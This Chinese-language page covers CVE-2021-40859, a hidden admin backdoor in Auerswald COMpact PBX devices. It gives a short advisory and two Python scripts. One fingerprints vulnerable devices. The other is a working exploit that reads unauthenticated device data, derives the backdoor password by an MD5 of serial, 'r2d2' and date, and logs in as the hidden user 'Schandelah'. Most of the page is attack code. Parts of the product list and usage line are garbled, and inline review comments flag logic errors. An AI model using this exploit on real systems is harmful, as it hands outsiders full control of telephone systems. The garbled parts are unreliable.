
在 Auerswald COMpact 5500R 7.8A 和 8.0B 设备中发现了后门,能够访问基于 Web 的管理应用程序的攻击者可借此获得对设备的完全管理访问权限。
产品:COMpact 3000 ISDN、COMpact 3000 模拟、COMpact 3000 VoIP、COMpact 4000、COMpact 5000(R)、COMpact 5200(R)、COMpact 5500R、COMmander 6000(R)(RX)、COMpact 5 COMpact VoIP、5000 VoIPder COMpact商务(19 英寸),指挥官 Basic.2(19 英寸)
受影响的版本:<= 8.0B(COMpact 4000、COMpact 5000(R)、COMpact 5200(R)、COMpact 5500R、COMmander 6000(R)(RX)),<= 4.0S(COMpact 3000 ISDN、COMpact 3000 analog、COMpact 3000 VoIP)
修复版本:8.2B、4.0T
漏洞类型:后门
安全风险:高
pip3 install requests lxml BeautifulSoup pandas python3 flagger.py http(s)://ippython3 CVE-2021-40859.py ip:port
flagger.py 会把设备返回的产品名称与易受攻击的产品列表进行比对,如果匹配,则将其标记为可能存在漏洞的产品。它只比对产品名称,不检查固件版本,因此已升级到修复版本的设备同样会被标记。为了进一步确认,请运行 CVE-2021-40859.py。
flagger.py
import sys
import requests
import logging
logging.basicConfig(level=logging.DEBUG)
# C0ded By @D0rkerDevil and @wabaf3t

# Fingerprinting helper: fetches <base-url>/about_state and reports when the
# product name returned by the device appears in the list below.
# NOTE(review): the page lost the original indentation; this layout assumes
# both print calls belong to the `if` inside the loop.
target_in = sys.argv[1]

# Entries are matched by exact equality against the `pbx` and `version`
# fields, so a device is only flagged when it reports that very string.
# NOTE(review): 'COMmander 6000(R)(RX))' ends in an unbalanced ')' and the
# "(R)" suffixes look like catalogue notation; confirm against real
# /about_state output before trusting a "no match" result.
product = [
    'COMpact 4000',
    'COMpact 5000(R)',
    'COMpact 5200(R)',
    'COMpact 5500R',
    'COMmander 6000(R)(RX))',
    'COMpact 3000 ISDN',
    'COMpact 3000 analog',
    'COMpact 3000 VoIP',
]

# verify=False skips TLS certificate validation, so the answer is not
# authenticated; timeout=3 keeps an unreachable host from hanging the run.
about_state = requests.get(target_in+'/about_state',verify=False,timeout=3).json()
device_info = (about_state['pbx'], about_state['version'])

RED = "\033[1;31m"
RESET = "\033[0m"

# The firmware version is printed but never compared with anything. The page
# lists 8.2B and 4.0T as the fixed releases, so a flagged device may already
# be patched; read the printed version before drawing a conclusion.
for name in product:
    if name not in device_info:
        continue
    print(RED+'''Auerswald COMpact Device Found - Product Name and Version+Build ->'''+RESET, device_info)
    print(RED+'''Most Likely the target is Vulnerable , Please confirm with the exploit avilable here -> https://github.com/dorkerdevil/CVE-2021-40859/blob/main/CVE-2021-40859.py '''+RESET)
CVE-2021-40859.py
import requests
import os
import json
import subprocess
import hashlib
from requests.auth import HTTPBasicAuth
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from bs4 import BeautifulSoup
import requests
import lxml.html as lh
import pandas as pd
import sys
from requests.auth import HTTPDigestAuth
# Banner. The escape sequences switch the author handles to bold red and back.
# NOTE(review): of the modules imported above, the code visible on this page
# references only requests, hashlib, sys, HTTPDigestAuth and
# InsecureRequestWarning; os, json, subprocess, HTTPBasicAuth, BeautifulSoup,
# lxml and pandas appear unused, so the install line pulls in more
# third-party packages than the script needs.
_RED = "\033[1;31m"
_RESET = "\033[0m"
print(' Coded By ' + _RED + '@D0rkerDevil @wabaf3t' + _RESET)
print('Testing your PBX - Hold your Horses')

# Python 2 shipped this module as httplib; Python 3 renamed it http.client.
try:
    import httplib
except ImportError:
    import http.client as httplib

# Every request in this script passes verify=False; this call silences the
# warning urllib3 would otherwise emit for each unverified HTTPS request.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Host to check, taken from the first command-line argument (the usage line
# on this page shows the form ip:port).
target = sys.argv[1]
def jack_login(target,default_pass):
    """Send one Digest-authenticated GET to https://<target>/tree.

    The request is made as user 'Schandelah' with ``default_pass`` as the
    password, a 3 second timeout, redirects followed and TLS certificate
    verification disabled.

    Returns True when a response with a truthy status code arrives, and
    None otherwise (any exception is printed and swallowed).

    NOTE(review): the status code is printed but not interpreted, so a
    rejected login (for example 401) also yields True. The caller's
    "logged in" message is therefore not proof that the account exists;
    read the printed status code and the firmware version instead.

    NOTE(review): setting HTTPConnection.debuglevel on the class turns on
    http.client debug output for the whole process, which echoes request
    headers (including the Digest Authorization header) to stdout. Keep
    that output out of shared logs.
    """
    try:
        httplib.HTTPConnection.debuglevel = 1
        digest = HTTPDigestAuth('Schandelah', default_pass)
        reply = requests.get(
            'https://'+target+'/tree',
            auth=digest,
            timeout=3,
            verify=False,
            allow_redirects=True,
        )
        if not reply.status_code:
            return None
        print(reply.status_code)
        return True
    except Exception as ex:
        print(ex)
def create_pass(target_hashval):
    """Return the MD5 hex digest of ``target_hashval``.

    The string is encoded with ``str.encode()`` (UTF-8 by default) before
    hashing. Any exception, such as a non-string argument, is printed and
    the function then returns None, so callers that slice the result must
    be prepared for None.
    """
    try:
        return hashlib.md5(target_hashval.encode()).hexdigest()
    except Exception as md5err:
        print(md5err)
def request_default(target_in):
    """Read https://<target_in>/about_state and summarise it in a dict.

    No credentials are sent with the request; TLS certificate verification
    is disabled and the timeout is 3 seconds.

    Returns a dict with these keys, in this order:
        target     'https://' + target_in
        version    first three characters of the text between "Version "
                   and " - Build" in the reported version string
        backdoor1  create_pass() of serial + "r2d2" + date
        backdoor2  create_pass() of serial + "r2d2" + date + "DE"
        is_vuln    True when float(version) <= 8.0, else False

    Any exception (network failure, missing key, unexpected version
    format) is printed and the function returns None.

    Both digests are built only from ``serial`` and ``date``, fields the
    device returns in this same unauthenticated response. The page names
    firmware 8.2B and 4.0T as the fixed releases.

    NOTE(review): ``is_vuln`` looks only at the leading "N.N" of the
    version. The build letter is ignored and the product line is not
    considered, so a COMpact 3000 on the fixed release 4.0T (4.0 <= 8.0)
    is still reported as vulnerable. Treat the flag as a hint and compare
    the full version string with the fixed releases.
    """
    try:
        base_url = 'https://'+target_in
        # Making a get request
        about_state = requests.get(base_url+'/about_state',verify=False,timeout=3).json()

        seed = about_state['serial']+"r2d2"+about_state['date']

        after_prefix = about_state['version'].split("Version ")[1]
        full_version = after_prefix.split(" - Build")[0]
        vuln_test = full_version[:3]

        # Values are evaluated top to bottom, matching the original order:
        # both digests are computed before the float comparison can raise.
        poc_info = {
            'target': base_url,
            'version': vuln_test,
            'backdoor1': create_pass(seed),
            'backdoor2': create_pass(seed+"DE"),
            'is_vuln': float(vuln_test) <= float(8.0),
        }
        return poc_info
    except Exception as ex:
        print(ex)
def main():
    """Print the derived values for ``target`` and the outcome of one login.

    Calls request_default(); when it returns nothing the function ends
    silently. Otherwise it prints the first seven hex characters of each
    digest, prints the whole report dict, and passes the 'Schandelah'
    value to jack_login(). The 'Admin' value is printed but never sent to
    the device.

    NOTE(review): the page lost the original indentation; this layout
    assumes the login attempt sits inside the ``if version_data:`` branch.

    NOTE(review): jack_login() returns True for any HTTP status, so the
    success message below does not by itself confirm the account exists.
    """
    version_data = request_default(target)
    if not version_data:
        return

    r2d2 = str(version_data['backdoor1'][0:7])
    c3po = str(version_data['backdoor2'][0:7])
    print("Default Pass Generated fo backdoor user Schandelah :"+r2d2)
    print("Default Pass Generated fo backdoor user Admin :"+c3po)
    print(version_data)

    try:
        outcome = "Succesfully Logged in with Default pass" if jack_login(target,r2d2) else "failed to auth"
        print(outcome)
    except Exception as ex:
        print(ex)


main()